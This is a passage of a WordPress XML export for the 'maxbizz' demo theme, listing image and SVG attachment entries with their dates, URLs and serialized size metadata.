		<pubDate>Tue, 08 Sep 2020 08:53:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>558</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:53:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:53:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg3-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/09/bg3-value.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-value-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-value-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-value-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-value-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/pheader-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>567</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:23:"2020/09/pheader-faq.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:22:"pheader-faq-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"pheader-faq-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"pheader-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"pheader-faq-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"pheader-faq-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/bg1-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:41:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>571</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:41:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:41:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:19:"2020/09/bg1-faq.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:18:"bg1-faq-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"bg1-faq-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"bg1-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"bg1-faq-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:20:"bg1-faq-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"bg1-faq-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"bg1-faq-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/bg2-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:46:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>574</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:46:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:46:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:681;s:4:"file";s:19:"2020/09/bg2-faq.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:19:"bg2-faq-300x106.jpg";s:5:"width";i:300;s:6:"height";i:106;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"bg2-faq-1024x363.jpg";s:5:"width";i:1024;s:6:"height";i:363;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"bg2-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"bg2-faq-768x272.jpg";s:5:"width";i:768;s:6:"height";i:272;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:20:"bg2-faq-1536x545.jpg";s:5:"width";i:1536;s:6:"height";i:545;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"bg2-faq-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/01-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>583</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/02-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>584</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/03-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>585</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/03-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/04-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>586</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/04-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/05-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>587</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz/faqs/06-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>588</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06-1.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-404</title>
		<link>http://wpdemo.archiwp.com/maxbizz/404-2/bg-404/</link>
		<pubDate>Wed, 09 Sep 2020 03:35:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-404.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>599</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:35:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:35:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-404]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>597</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-404.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-404.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:950;s:4:"file";s:18:"2020/09/bg-404.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:18:"bg-404-300x148.jpg";s:5:"width";i:300;s:6:"height";i:148;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"bg-404-1024x507.jpg";s:5:"width";i:1024;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"bg-404-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"bg-404-768x380.jpg";s:5:"width";i:768;s:6:"height";i:380;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:19:"bg-404-1536x760.jpg";s:5:"width";i:1536;s:6:"height";i:760;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"bg-404-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"bg-404-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>coming-soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz/coming-soon/coming-soon-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:47:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>607</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:47:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:47:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>604</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/coming-soon.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1080;s:4:"file";s:23:"2020/09/coming-soon.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:23:"coming-soon-300x169.jpg";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"coming-soon-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"coming-soon-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"coming-soon-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"coming-soon-1536x864.jpg";s:5:"width";i:1536;s:6:"height";i:864;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"coming-soon-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"coming-soon-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/pheader-elements/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>625</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
